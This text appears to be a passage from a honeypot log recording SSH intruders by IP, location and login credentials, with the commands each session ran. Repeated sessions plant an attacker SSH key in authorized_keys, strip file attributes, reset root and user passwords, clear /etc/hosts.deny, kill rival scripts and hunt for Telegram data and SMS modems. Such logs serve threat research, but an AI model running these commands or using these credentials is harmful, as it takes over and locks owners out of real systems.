$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:9NsRsSXwXFke"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 rogue_root_85 (194.233.64.17) β€” Singapore, Singapore Β· 2 sessions Β· 2 cmds
2026-05-21 08:59 EDT Β· as root/Swissmp@007, root/blackcat
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a Γ—2 // OS/kernel identification
🎭 jade_root_19 (42.51.33.162) β€” Shenzhen, China Β· 1 session Β· 19 cmds
2026-05-21 18:45 EDT Β· as root/node2024
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:YdXVi7SABdcX"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 viking_root_7 (90.228.249.49) β€” KΓ€vlinge, Sweden Β· 2 sessions Β· 18 cmds
2026-05-21 17:41 EDT Β· as root/guest
network mapping β†’ OS/kernel identification β†’ CPU profiling
$ /ip cloud print Γ—2
$ ifconfig Γ—2 // network mapping
$ uname -a Γ—2 // OS/kernel identification
$ cat /proc/cpuinfo Γ—2 // CPU profiling
$ ps | grep '[Mm]iner' Γ—2
$ ps -ef | grep '[Mm]iner' Γ—2
$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/* Γ—2
$ locate D877F783D5D3EF8Cs Γ—2
$ echo Hi | cat -n Γ—2
🎭 monsoon_root_13 (34.93.241.217) β€” Mumbai, India Β· 1 session Β· 1 cmd
2026-05-21 18:12 EDT Β· as root/swissmp2023.
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 rogue_root_86 (197.227.8.186) β€” Ebene CyberCity, Mauritius Β· 2 sessions Β· 39 cmds
2026-05-13 03:52 EDT Β· as root/P@ssw0rd@2019, webadmin/webadmin
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "webadmin\n1I066CVbzBUH\n1I066CVbzBUH"|passwd|bash
$ Enter new UNIX password:
$ echo "webadmin\n1I066CVbzBUH\n1I066CVbzBUH\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:IOV7v1YUggKh"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 acai_root_7 (177.6.162.182) β€” Ponta Grossa, Brazil Β· 2 sessions Β· 38 cmds
2026-05-21 17:16 EDT Β· as root/Server123, root/qwer@12345
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:3rsqhF2VKHDK"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:uMWbb1zE8HN0"|chpasswd|bash
🎭 panda_root_27 (14.103.106.86) β€” Beijing, China Β· 1 session Β· 20 cmds
2026-05-21 17:37 EDT Β· as webadmin/webadmin
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "webadmin\nvGLZr38I5y1K\nvGLZr38I5y1K"|passwd|bash
$ Enter new UNIX password:
$ echo "webadmin\nvGLZr38I5y1K\nvGLZr38I5y1K\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 cipher_root_69 (103.27.36.2) β€” Gamping Lor, Indonesia Β· 1 session Β· 19 cmds
2026-05-21 17:31 EDT Β· as root/Abc1234@
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:et0HYCLaTDvX"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 burger_root_44 (198.23.238.48) β€” Elk Grove Village, United States Β· 1 session Β· 19 cmds
2026-05-21 17:19 EDT Β· as root/Server123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:SfFkOYtOoNz4"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 capoeira_root_13 (190.115.84.25) β€” Leopoldo de BulhΓ΅es, Brazil Β· 2 sessions Β· 2 cmds
2026-05-21 08:19 EDT Β· as root/Swissmp$2021, root/blackcat
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a Γ—2 // OS/kernel identification
🎭 shadow_12 (20.13.164.162) β€” Dublin, Ireland Β· 1 session Β· 20 cmds
2026-05-21 17:00 EDT Β· as alan/alan
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "alan\nxmibQ0qHuVuG\nxmibQ0qHuVuG"|passwd|bash
$ Enter new UNIX password:
$ echo "alan\nxmibQ0qHuVuG\nxmibQ0qHuVuG\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 jade_root_20 (120.48.28.60) β€” Beijing, China Β· 1 session Β· 19 cmds
2026-05-21 16:53 EDT Β· as root/00000000
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:Y5UVqaXiYYxA"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 wraith_12 (37.222.188.4) β€” Madrid, Spain Β· 1 session Β· 20 cmds
2026-05-21 16:51 EDT Β· as student2/student2
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "student2\nNaUCwACJti5r\nNaUCwACJti5r"|passwd|bash
$ Enter new UNIX password:
$ echo "student2\nNaUCwACJti5r\nNaUCwACJti5r\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 rogue_13 (5.223.48.217) β€” Singapore, Singapore Β· 1 session Β· 20 cmds
2026-05-21 16:50 EDT Β· as devel/devel
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "devel\nekcgARtSHEu3\nekcgARtSHEu3"|passwd|bash
$ Enter new UNIX password:
$ echo "devel\nekcgARtSHEu3\nekcgARtSHEu3\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 fika_root_4 (171.25.158.82) β€” Vaxjo, Sweden Β· 1 session Β· 19 cmds
2026-05-21 16:48 EDT Β· as root/Design@123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:aW67TmIzPA9l"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 specter_root_80 (150.5.169.138) β€” Hong Kong, Hong Kong Β· 1 session Β· 20 cmds
2026-05-21 16:45 EDT Β· as piyush/piyush@123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "piyush@123\nZUqSPGITw0Ol\nZUqSPGITw0Ol"|passwd|bash
$ Enter new UNIX password:
$ echo "piyush@123\nZUqSPGITw0Ol\nZUqSPGITw0Ol\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 eagle_root_38 (162.240.237.81) β€” Phoenix, United States Β· 2 sessions Β· 2 cmds
2026-05-21 08:17 EDT Β· as root/blackcat, root/swissmp@2025!
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a Γ—2 // OS/kernel identification
🎭 tiger_root_15 (49.207.40.162) β€” Delhi, India Β· 1 session Β· 19 cmds
2026-05-21 16:13 EDT Β· as root/Lm@123456
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:Oj2xaon3OLWE"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 dragon_root_22 (14.103.114.205) β€” Beijing, China Β· 1 session Β· 20 cmds
